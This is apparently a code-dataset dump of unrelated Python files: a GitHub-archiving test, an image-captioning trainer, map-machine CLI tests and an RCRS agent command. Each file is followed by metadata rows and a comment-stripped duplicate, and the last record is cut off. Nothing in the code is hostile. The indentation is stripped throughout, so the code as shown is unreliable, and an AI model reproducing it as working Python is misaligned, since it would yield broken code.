self.repo_string = 'owp-open-source-project-template'
self.repo_w_wiki = 'DMOD'
self.org = self.github.get_organization(self.org_string)
self.wiki_repo = self.org.get_repo(self.repo_w_wiki)
self.repo = self.org.get_repo(self.repo_string)
self.time = strftime("%Y-%m-%d_%H:%M:%S", gmtime())
def tearDown(self):
for p in Path(TestGetGithub._current_dir).glob("*.json"):
if p.is_file():
p.unlink()
for p in Path(TestGetGithub._current_dir).glob("*.tar.gz"):
if p.is_file():
p.unlink()
def test_get_repo_meta(self):
meta = get_repo_meta(self.repo, self.time, TestGetGithub._current_dir)
self.assertIsNotNone(meta)
self.assertTrue(len(meta), 6)
pattern = "{repo}_{name}_{time}.json".format(repo=self.repo_string, name="{name}", time=self.time)
self.assertEqual(meta[0].name, pattern.format(name='comments'))
self.assertEqual(meta[1].name, pattern.format(name='issues'))
self.assertEqual(meta[2].name, pattern.format(name='issue_comments'))
self.assertEqual(meta[3].name, pattern.format(name='pulls'))
self.assertEqual(meta[4].name, pattern.format(name='pulls_comments'))
self.assertEqual(meta[5].name, pattern.format(name='pulls_review_comments'))
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issues')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issue_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_review_comments')).exists())
def test_clone_and_archive(self):
self.assertFalse(self.repo.has_wiki)
clone_url = self.repo.clone_url
archive_name = clone_and_archive(self.repo_string, clone_url, self.time, TestGetGithub._current_dir, [])
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_string, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
def test_clone_and_archive_1(self):
self.assertTrue(self.wiki_repo.has_wiki)
wiki_url = self.wiki_repo.clone_url[:-3]+'wiki.git'
clone_url = self.wiki_repo.clone_url
archive_name = clone_and_archive(self.repo_w_wiki, clone_url, self.time, TestGetGithub._current_dir, [], wiki_url)
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_w_wiki, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
@unittest.skip("Incomplete mock implementation for dumped item")
def test_dump_list(self):
pass
outfile = dump_list("test_repo", self.time, TestGetGithub._current_dir, "test_key", [ '{json=dict, test=values}', 'json=dict2, test=values2}'])
with open(outfile) as fp:
data = json.load(fp)
self.assertTrue(data['json'], 'dict')
| true
| true
|
790c7063d06c1fc8c43a95332b64d7e32dc32159
| 14,307
|
py
|
Python
|
trainer/trainer.py
|
Renovamen/Image-Captioning
|
de8d4f553a22e967fa56a01d5b4a2206b9431771
|
[
"MIT"
] | 5
|
2020-11-03T16:08:18.000Z
|
2022-01-17T03:56:15.000Z
|
trainer/trainer.py
|
Renovamen/Image-Caption
|
de8d4f553a22e967fa56a01d5b4a2206b9431771
|
[
"MIT"
] | null | null | null |
trainer/trainer.py
|
Renovamen/Image-Caption
|
de8d4f553a22e967fa56a01d5b4a2206b9431771
|
[
"MIT"
] | 1
|
2020-11-03T11:29:36.000Z
|
2020-11-03T11:29:36.000Z
|
import time
from typing import Optional, Dict
import torch
from torch import nn, optim
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pack_padded_sequence
from utils import TensorboardWriter, AverageMeter, save_checkpoint, accuracy, \
clip_gradient, adjust_learning_rate
from metrics import Metrics
class Trainer:
"""
Encoder-decoder pipeline. Tearcher Forcing is used during training and validation.
Parameters
----------
caption_model : str
Type of the caption model
epochs : int
We should train the model for __ epochs
device : torch.device
Use GPU or not
word_map : Dict[str, int]
Word2id map
rev_word_map : Dict[int, str]
Id2word map
start_epoch : int
We should start training the model from __th epoch
epochs_since_improvement : int
Number of epochs since last improvement in BLEU-4 score
best_bleu4 : float
Best BLEU-4 score until now
train_loader : DataLoader
DataLoader for training data
val_loader : DataLoader
DataLoader for validation data
encoder : nn.Module
Encoder (based on CNN)
decoder : nn.Module
Decoder (based on LSTM)
encoder_optimizer : optim.Optimizer
Optimizer for encoder (Adam) (if fine-tune)
decoder_optimizer : optim.Optimizer
Optimizer for decoder (Adam)
loss_function : nn.Module
Loss function (cross entropy)
grad_clip : float
Gradient threshold in clip gradients
tau : float
Penalty term τ for doubly stochastic attention in paper: show, attend and tell
fine_tune_encoder : bool
Fine-tune encoder or not
tensorboard : bool, optional, default=False
Enable tensorboard or not?
log_dir : str, optional
Path to the folder to save logs for tensorboard
"""
def __init__(
self,
caption_model: str,
epochs: int,
device: torch.device,
word_map: Dict[str, int],
rev_word_map: Dict[int, str],
start_epoch: int,
epochs_since_improvement: int,
best_bleu4: float,
train_loader: DataLoader,
val_loader: DataLoader,
encoder: nn.Module,
decoder: nn.Module,
encoder_optimizer: optim.Optimizer,
decoder_optimizer: optim.Optimizer,
loss_function: nn.Module,
grad_clip: float,
tau: float,
fine_tune_encoder: bool,
tensorboard: bool = False,
log_dir: Optional[str] = None
) -> None:
self.device = device # GPU / CPU
self.caption_model = caption_model
self.epochs = epochs
self.word_map = word_map
self.rev_word_map = rev_word_map
self.start_epoch = start_epoch
self.epochs_since_improvement = epochs_since_improvement
self.best_bleu4 = best_bleu4
self.train_loader = train_loader
self.val_loader = val_loader
self.encoder = encoder
self.decoder = decoder
self.encoder_optimizer = encoder_optimizer
self.decoder_optimizer = decoder_optimizer
self.loss_function = loss_function
self.tau = tau
self.grad_clip = grad_clip
self.fine_tune_encoder = fine_tune_encoder
self.print_freq = 100 # print training/validation stats every __ batches
# setup visualization writer instance
self.writer = TensorboardWriter(log_dir, tensorboard)
self.len_epoch = len(self.train_loader)
def train(self, epoch: int) -> None:
"""
Train an epoch
Parameters
----------
epoch : int
Current number of epoch
"""
self.decoder.train() # train mode (dropout and batchnorm is used)
self.encoder.train()
batch_time = AverageMeter() # forward prop. + back prop. time
data_time = AverageMeter() # data loading time
losses = AverageMeter(tag='loss', writer=self.writer) # loss (per word decoded)
top5accs = AverageMeter(tag='top5acc', writer=self.writer) # top5 accuracy
start = time.time()
# batches
for i, (imgs, caps, caplens) in enumerate(self.train_loader):
data_time.update(time.time() - start)
# Move to GPU, if available
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
# forward encoder
imgs = self.encoder(imgs)
# forward decoder
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
# since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores = pack_padded_sequence(scores, decode_lengths, batch_first=True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first=True)[0]
# calc loss
loss = self.loss_function(scores, targets)
# doubly stochastic attention regularization (in paper: show, attend and tell)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
# clear gradient of last batch
self.decoder_optimizer.zero_grad()
if self.encoder_optimizer is not None:
self.encoder_optimizer.zero_grad()
# backward
loss.backward()
# clip gradients
if self.grad_clip is not None:
clip_gradient(self.decoder_optimizer, self.grad_clip)
if self.encoder_optimizer is not None:
clip_gradient(self.encoder_optimizer, self.grad_clip)
# update weights
self.decoder_optimizer.step()
if self.encoder_optimizer is not None:
self.encoder_optimizer.step()
# set step for tensorboard
step = (epoch - 1) * self.len_epoch + i
self.writer.set_step(step=step, mode='train')
# keep track of metrics
top5 = accuracy(scores, targets, 5)
losses.update(loss.item(), sum(decode_lengths))
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
# print status
if i % self.print_freq == 0:
print(
'Epoch: [{0}][{1}/{2}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data Load Time {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i, len(self.train_loader),
batch_time = batch_time,
data_time = data_time,
loss = losses,
top5 = top5accs
)
)
def validate(self) -> float:
"""
Validate an epoch.
Returns
-------
bleu4 : float
BLEU-4 score
"""
self.decoder.eval() # eval mode (no dropout or batchnorm)
if self.encoder is not None:
self.encoder.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top5accs = AverageMeter()
start = time.time()
ground_truth = list() # ground_truth (true captions) for calculating BLEU-4 score
prediction = list() # prediction (predicted captions)
# explicitly disable gradient calculation to avoid CUDA memory error
# solves the issue #57
with torch.no_grad():
# Batches
for i, (imgs, caps, caplens, allcaps) in enumerate(self.val_loader):
# move to device, if available
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
# forward encoder
if self.encoder is not None:
imgs = self.encoder(imgs)
# forward decoder
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
# since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores_copy = scores.clone()
scores = pack_padded_sequence(scores, decode_lengths, batch_first = True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first = True)[0]
# calc loss
loss = self.loss_function(scores, targets)
# doubly stochastic attention regularization (in paper: show, attend and tell)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
# keep track of metrics
losses.update(loss.item(), sum(decode_lengths))
top5 = accuracy(scores, targets, 5)
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
if i % self.print_freq == 0:
print('Validation: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})\t'.format(i, len(self.val_loader),
batch_time = batch_time,
loss = losses,
top5 = top5accs)
)
# store ground truth captions and predicted captions of each image
# for n images, each of them has one prediction and multiple ground truths (a, b, c...):
# prediction = [ [hyp1], [hyp2], ..., [hypn] ]
# ground_truth = [ [ [ref1a], [ref1b], [ref1c] ], ..., [ [refna], [refnb] ] ]
# ground truth
allcaps = allcaps[sort_ind] # because images were sorted in the decoder
for j in range(allcaps.shape[0]):
img_caps = allcaps[j].tolist()
img_captions = list(
map(
lambda c: [w for w in c if w not in {self.word_map['<start>'], self.word_map['<pad>']}],
img_caps
)
) # remove <start> and pads
ground_truth.append(img_captions)
# prediction
_, preds = torch.max(scores_copy, dim = 2)
preds = preds.tolist()
temp_preds = list()
for j, p in enumerate(preds):
temp_preds.append(preds[j][:decode_lengths[j]]) # remove pads
preds = temp_preds
prediction.extend(preds)
assert len(ground_truth) == len(prediction)
# calc BLEU-4 and CIDEr score
metrics = Metrics(ground_truth, prediction, self.rev_word_map)
bleu4 = metrics.belu[3] # BLEU-4
cider = metrics.cider # CIDEr
print(
'\n * LOSS - {loss.avg:.3f}, TOP-5 ACCURACY - {top5.avg:.3f}, BLEU-4 - {bleu}, CIDEr - {cider}\n'.format(
loss = losses,
top5 = top5accs,
bleu = bleu4,
cider = cider
)
)
return bleu4
def run_train(self) -> None:
# epochs
for epoch in range(self.start_epoch, self.epochs):
# decay learning rate if there is no improvement for 8 consecutive epochs
# terminate training if there is no improvement for 20 consecutive epochs
if self.epochs_since_improvement == 20:
break
if self.epochs_since_improvement > 0 and self.epochs_since_improvement % 8 == 0:
adjust_learning_rate(self.decoder_optimizer, 0.8)
if self.fine_tune_encoder:
adjust_learning_rate(self.encoder_optimizer, 0.8)
# train an epoch
self.train(epoch = epoch)
# validate an epoch
recent_bleu4 = self.validate()
# epochs num since last improvement
is_best = recent_bleu4 > self.best_bleu4
self.best_bleu4 = max(recent_bleu4, self.best_bleu4)
if not is_best:
self.epochs_since_improvement += 1
print("\nEpochs since last improvement: %d\n" % (self.epochs_since_improvement,))
else:
self.epochs_since_improvement = 0
# save checkpoint
save_checkpoint(
epoch = epoch,
epochs_since_improvement = self.epochs_since_improvement,
encoder = self.encoder,
decoder = self.decoder,
encoder_optimizer = self.encoder_optimizer,
decoder_optimizer = self.decoder_optimizer,
caption_model = self.caption_model,
bleu4 = recent_bleu4,
is_best = is_best
)
| 36.77892
| 121
| 0.551618
|
import time
from typing import Optional, Dict
import torch
from torch import nn, optim
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pack_padded_sequence
from utils import TensorboardWriter, AverageMeter, save_checkpoint, accuracy, \
clip_gradient, adjust_learning_rate
from metrics import Metrics
class Trainer:
def __init__(
self,
caption_model: str,
epochs: int,
device: torch.device,
word_map: Dict[str, int],
rev_word_map: Dict[int, str],
start_epoch: int,
epochs_since_improvement: int,
best_bleu4: float,
train_loader: DataLoader,
val_loader: DataLoader,
encoder: nn.Module,
decoder: nn.Module,
encoder_optimizer: optim.Optimizer,
decoder_optimizer: optim.Optimizer,
loss_function: nn.Module,
grad_clip: float,
tau: float,
fine_tune_encoder: bool,
tensorboard: bool = False,
log_dir: Optional[str] = None
) -> None:
self.device = device
self.caption_model = caption_model
self.epochs = epochs
self.word_map = word_map
self.rev_word_map = rev_word_map
self.start_epoch = start_epoch
self.epochs_since_improvement = epochs_since_improvement
self.best_bleu4 = best_bleu4
self.train_loader = train_loader
self.val_loader = val_loader
self.encoder = encoder
self.decoder = decoder
self.encoder_optimizer = encoder_optimizer
self.decoder_optimizer = decoder_optimizer
self.loss_function = loss_function
self.tau = tau
self.grad_clip = grad_clip
self.fine_tune_encoder = fine_tune_encoder
self.print_freq = 100
self.writer = TensorboardWriter(log_dir, tensorboard)
self.len_epoch = len(self.train_loader)
def train(self, epoch: int) -> None:
self.decoder.train()
self.encoder.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter(tag='loss', writer=self.writer)
top5accs = AverageMeter(tag='top5acc', writer=self.writer)
start = time.time()
for i, (imgs, caps, caplens) in enumerate(self.train_loader):
data_time.update(time.time() - start)
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
imgs = self.encoder(imgs)
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
targets = caps_sorted[:, 1:]
# pack_padded_sequence is an easy trick to do this
scores = pack_padded_sequence(scores, decode_lengths, batch_first=True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first=True)[0]
# calc loss
loss = self.loss_function(scores, targets)
# doubly stochastic attention regularization (in paper: show, attend and tell)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
# clear gradient of last batch
self.decoder_optimizer.zero_grad()
if self.encoder_optimizer is not None:
self.encoder_optimizer.zero_grad()
# backward
loss.backward()
# clip gradients
if self.grad_clip is not None:
clip_gradient(self.decoder_optimizer, self.grad_clip)
if self.encoder_optimizer is not None:
clip_gradient(self.encoder_optimizer, self.grad_clip)
# update weights
self.decoder_optimizer.step()
if self.encoder_optimizer is not None:
self.encoder_optimizer.step()
# set step for tensorboard
step = (epoch - 1) * self.len_epoch + i
self.writer.set_step(step=step, mode='train')
# keep track of metrics
top5 = accuracy(scores, targets, 5)
losses.update(loss.item(), sum(decode_lengths))
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
# print status
if i % self.print_freq == 0:
print(
'Epoch: [{0}][{1}/{2}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data Load Time {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i, len(self.train_loader),
batch_time = batch_time,
data_time = data_time,
loss = losses,
top5 = top5accs
)
)
def validate(self) -> float:
self.decoder.eval() # eval mode (no dropout or batchnorm)
if self.encoder is not None:
self.encoder.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top5accs = AverageMeter()
start = time.time()
ground_truth = list() # ground_truth (true captions) for calculating BLEU-4 score
prediction = list() # prediction (predicted captions)
# explicitly disable gradient calculation to avoid CUDA memory error
# solves the issue #57
with torch.no_grad():
# Batches
for i, (imgs, caps, caplens, allcaps) in enumerate(self.val_loader):
# move to device, if available
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
# forward encoder
if self.encoder is not None:
imgs = self.encoder(imgs)
# forward decoder
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
# since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# remove timesteps that we didn't decode at, or are pads
scores_copy = scores.clone()
scores = pack_padded_sequence(scores, decode_lengths, batch_first = True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first = True)[0]
loss = self.loss_function(scores, targets)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
losses.update(loss.item(), sum(decode_lengths))
top5 = accuracy(scores, targets, 5)
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
if i % self.print_freq == 0:
print('Validation: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})\t'.format(i, len(self.val_loader),
batch_time = batch_time,
loss = losses,
top5 = top5accs)
)
allcaps = allcaps[sort_ind]
for j in range(allcaps.shape[0]):
img_caps = allcaps[j].tolist()
img_captions = list(
map(
lambda c: [w for w in c if w not in {self.word_map['<start>'], self.word_map['<pad>']}],
img_caps
)
)
ground_truth.append(img_captions)
_, preds = torch.max(scores_copy, dim = 2)
preds = preds.tolist()
temp_preds = list()
for j, p in enumerate(preds):
temp_preds.append(preds[j][:decode_lengths[j]])
preds = temp_preds
prediction.extend(preds)
assert len(ground_truth) == len(prediction)
metrics = Metrics(ground_truth, prediction, self.rev_word_map)
bleu4 = metrics.belu[3]
cider = metrics.cider
print(
'\n * LOSS - {loss.avg:.3f}, TOP-5 ACCURACY - {top5.avg:.3f}, BLEU-4 - {bleu}, CIDEr - {cider}\n'.format(
loss = losses,
top5 = top5accs,
bleu = bleu4,
cider = cider
)
)
return bleu4
def run_train(self) -> None:
for epoch in range(self.start_epoch, self.epochs):
if self.epochs_since_improvement == 20:
break
if self.epochs_since_improvement > 0 and self.epochs_since_improvement % 8 == 0:
adjust_learning_rate(self.decoder_optimizer, 0.8)
if self.fine_tune_encoder:
adjust_learning_rate(self.encoder_optimizer, 0.8)
self.train(epoch = epoch)
recent_bleu4 = self.validate()
is_best = recent_bleu4 > self.best_bleu4
self.best_bleu4 = max(recent_bleu4, self.best_bleu4)
if not is_best:
self.epochs_since_improvement += 1
print("\nEpochs since last improvement: %d\n" % (self.epochs_since_improvement,))
else:
self.epochs_since_improvement = 0
save_checkpoint(
epoch = epoch,
epochs_since_improvement = self.epochs_since_improvement,
encoder = self.encoder,
decoder = self.decoder,
encoder_optimizer = self.encoder_optimizer,
decoder_optimizer = self.decoder_optimizer,
caption_model = self.caption_model,
bleu4 = recent_bleu4,
is_best = is_best
)
| true
| true
|
790c70b70ca4c956926737136d747698a3c0c9c8
| 4,357
|
py
|
Python
|
tests/test_command_line.py
|
Strubbl/map-machine
|
e2c6f8cd373bc5dba322129112cfa58874a8321b
|
[
"MIT"
] | null | null | null |
tests/test_command_line.py
|
Strubbl/map-machine
|
e2c6f8cd373bc5dba322129112cfa58874a8321b
|
[
"MIT"
] | null | null | null |
tests/test_command_line.py
|
Strubbl/map-machine
|
e2c6f8cd373bc5dba322129112cfa58874a8321b
|
[
"MIT"
] | null | null | null |
"""
Test command line commands.
"""
from pathlib import Path
from subprocess import PIPE, Popen
__author__ = "Sergey Vartanov"
__email__ = "me@enzet.ru"
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from map_machine.ui.cli import COMMAND_LINES
LOG: bytes = (
b"INFO Constructing ways...\n"
b"INFO Constructing nodes...\n"
b"INFO Drawing ways...\n"
b"INFO Drawing main icons...\n"
b"INFO Drawing extra icons...\n"
b"INFO Drawing texts...\n"
)
def error_run(arguments: list[str], message: bytes) -> None:
"""Run command that should fail and check error message."""
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode != 0
assert error == message
def run(arguments: list[str], message: bytes) -> None:
"""Run command that should fail and check error message."""
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode == 0
assert error == message
def test_wrong_render_arguments() -> None:
"""Test `render` command with wrong arguments."""
error_run(
["render", "-z", "17"],
b"CRITICAL Specify either --input, or --boundary-box, or --coordinates "
b"and --size.\n",
)
def test_render() -> None:
"""Test `render` command."""
run(
COMMAND_LINES["render"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
# 4 expected elements: `defs`, `rect` (background), `g` (outline),
# `g` (icon), 4 `text` elements (credits).
assert len(root) == 8
assert len(root[3][0]) == 0
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_render_with_tooltips() -> None:
"""Test `render` command."""
run(
COMMAND_LINES["render_with_tooltips"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
# 4 expected elements: `defs`, `rect` (background), `g` (outline),
# `g` (icon), 4 `text` elements (credits).
assert len(root) == 8
assert len(root[3][0]) == 1
assert root[3][0][0].text == "natural: tree"
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_icons() -> None:
"""Test `icons` command."""
run(
COMMAND_LINES["icons"],
b"INFO Icons are written to out/icons_by_name and out/icons_by_id.\n"
b"INFO Icon grid is written to out/icon_grid.svg.\n"
b"INFO Icon grid is written to doc/grid.svg.\n",
)
assert (Path("out") / "icon_grid.svg").is_file()
assert (Path("out") / "icons_by_name").is_dir()
assert (Path("out") / "icons_by_id").is_dir()
assert (Path("out") / "icons_by_name" / "Röntgen apple.svg").is_file()
assert (Path("out") / "icons_by_id" / "apple.svg").is_file()
def test_mapcss() -> None:
"""Test `mapcss` command."""
run(
COMMAND_LINES["mapcss"],
b"INFO MapCSS 0.2 scheme is written to out/map_machine_mapcss.\n",
)
assert (Path("out") / "map_machine_mapcss").is_dir()
assert (Path("out") / "map_machine_mapcss" / "icons").is_dir()
assert (
Path("out") / "map_machine_mapcss" / "icons" / "apple.svg"
).is_file()
assert (Path("out") / "map_machine_mapcss" / "map_machine.mapcss").is_file()
def test_element() -> None:
"""Test `element` command."""
run(
COMMAND_LINES["element"],
b"INFO Element is written to out/element.svg.\n",
)
assert (Path("out") / "element.svg").is_file()
def test_tile() -> None:
"""Test `tile` command."""
run(
COMMAND_LINES["tile"] + ["--cache", "tests/data"],
LOG + b"INFO Tile is drawn to out/tiles/tile_18_160199_88904.svg.\n"
b"INFO SVG file is rasterized to out/tiles/tile_18_160199_88904.png.\n",
)
assert (Path("out") / "tiles" / "tile_18_160199_88904.svg").is_file()
assert (Path("out") / "tiles" / "tile_18_160199_88904.png").is_file()
| 32.274074
| 80
| 0.614184
|
from pathlib import Path
from subprocess import PIPE, Popen
__author__ = "Sergey Vartanov"
__email__ = "me@enzet.ru"
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from map_machine.ui.cli import COMMAND_LINES
LOG: bytes = (
b"INFO Constructing ways...\n"
b"INFO Constructing nodes...\n"
b"INFO Drawing ways...\n"
b"INFO Drawing main icons...\n"
b"INFO Drawing extra icons...\n"
b"INFO Drawing texts...\n"
)
def error_run(arguments: list[str], message: bytes) -> None:
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode != 0
assert error == message
def run(arguments: list[str], message: bytes) -> None:
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode == 0
assert error == message
def test_wrong_render_arguments() -> None:
error_run(
["render", "-z", "17"],
b"CRITICAL Specify either --input, or --boundary-box, or --coordinates "
b"and --size.\n",
)
def test_render() -> None:
run(
COMMAND_LINES["render"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
assert len(root) == 8
assert len(root[3][0]) == 0
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_render_with_tooltips() -> None:
run(
COMMAND_LINES["render_with_tooltips"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
assert len(root) == 8
assert len(root[3][0]) == 1
assert root[3][0][0].text == "natural: tree"
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_icons() -> None:
run(
COMMAND_LINES["icons"],
b"INFO Icons are written to out/icons_by_name and out/icons_by_id.\n"
b"INFO Icon grid is written to out/icon_grid.svg.\n"
b"INFO Icon grid is written to doc/grid.svg.\n",
)
assert (Path("out") / "icon_grid.svg").is_file()
assert (Path("out") / "icons_by_name").is_dir()
assert (Path("out") / "icons_by_id").is_dir()
assert (Path("out") / "icons_by_name" / "Röntgen apple.svg").is_file()
assert (Path("out") / "icons_by_id" / "apple.svg").is_file()
def test_mapcss() -> None:
run(
COMMAND_LINES["mapcss"],
b"INFO MapCSS 0.2 scheme is written to out/map_machine_mapcss.\n",
)
assert (Path("out") / "map_machine_mapcss").is_dir()
assert (Path("out") / "map_machine_mapcss" / "icons").is_dir()
assert (
Path("out") / "map_machine_mapcss" / "icons" / "apple.svg"
).is_file()
assert (Path("out") / "map_machine_mapcss" / "map_machine.mapcss").is_file()
def test_element() -> None:
run(
COMMAND_LINES["element"],
b"INFO Element is written to out/element.svg.\n",
)
assert (Path("out") / "element.svg").is_file()
def test_tile() -> None:
run(
COMMAND_LINES["tile"] + ["--cache", "tests/data"],
LOG + b"INFO Tile is drawn to out/tiles/tile_18_160199_88904.svg.\n"
b"INFO SVG file is rasterized to out/tiles/tile_18_160199_88904.png.\n",
)
assert (Path("out") / "tiles" / "tile_18_160199_88904.svg").is_file()
assert (Path("out") / "tiles" / "tile_18_160199_88904.png").is_file()
| true
| true
|
790c70dd7b2d68161eee7a1e5b35a2002b99546d
| 816
|
py
|
Python
|
rcrs_core/commands/AKTell.py
|
roborescue/rcrs-core-python
|
9e48e5778ee7ccd524d3f9ba47d23d892e175d66
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T12:27:29.000Z
|
2022-03-11T12:27:29.000Z
|
rcrs_core/commands/AKTell.py
|
roborescue/rcrs-core-python
|
9e48e5778ee7ccd524d3f9ba47d23d892e175d66
|
[
"BSD-3-Clause"
] | 1
|
2022-01-12T19:57:51.000Z
|
2022-01-12T19:57:51.000Z
|
rcrs_core/commands/AKTell.py
|
roborescue/rcrs-core-python
|
9e48e5778ee7ccd524d3f9ba47d23d892e175d66
|
[
"BSD-3-Clause"
] | null | null | null |
from rcrs_core.commands.Command import Command
from rcrs_core.worldmodel.entityID import EntityID
from rcrs_core.connection import URN
from rcrs_core.connection import RCRSProto_pb2
class AKTell(Command):
def __init__(self, agent_id: EntityID, time: int, message: str) -> None:
super().__init__()
self.urn = URN.Command.AK_TELL
self.agent_id = agent_id
self.message = message.encode('utf-8')
self.time = time
def prepare_cmd(self):
msg = RCRSProto_pb2.MessageProto()
msg.urn = self.urn
msg.components[URN.ComponentControlMSG.AgentID].entityID = self.agent_id.get_value()
msg.components[URN.ComponentControlMSG.Time].intValue = self.time
msg.components[URN.ComponentCommand.Message].rawData = self.message
return msg
| 35.478261
| 92
| 0.708333
|
from rcrs_core.commands.Command import Command
from rcrs_core.worldmodel.entityID import EntityID
from rcrs_core.connection import URN
from rcrs_core.connection import RCRSProto_pb2
class AKTell(Command):
def __init__(self, agent_id: EntityID, time: int, message: str) -> None:
super().__init__()
self.urn = URN.Command.AK_TELL
self.agent_id = agent_id
self.message = message.encode('utf-8')
self.time = time
def prepare_cmd(self):
msg = RCRSProto_pb2.MessageProto()
msg.urn = self.urn
msg.components[URN.ComponentControlMSG.AgentID].entityID = self.agent_id.get_value()
msg.components[URN.ComponentControlMSG.Time].intValue = self.time
msg.components[URN.ComponentCommand.Message].rawData = self.message
return msg
| true
| true
|
790c7255a53b1468fcafec62c1b123a267fb8466
| 782
|
py
|
Python
|
project/urls.py
|
lucasazevedo/visitor-control
|
2daed747f68d04b1bda98bd51fe0876044e1cc54
|
[
"MIT"
] | null | null | null |
project/urls.py
|
lucasazevedo/visitor-control
|
2daed747f68d04b1bda98bd51fe0876044e1cc54
|
[
"MIT"
] | null | null | null |
project/urls.py
|
lucasazevedo/visitor-control
|
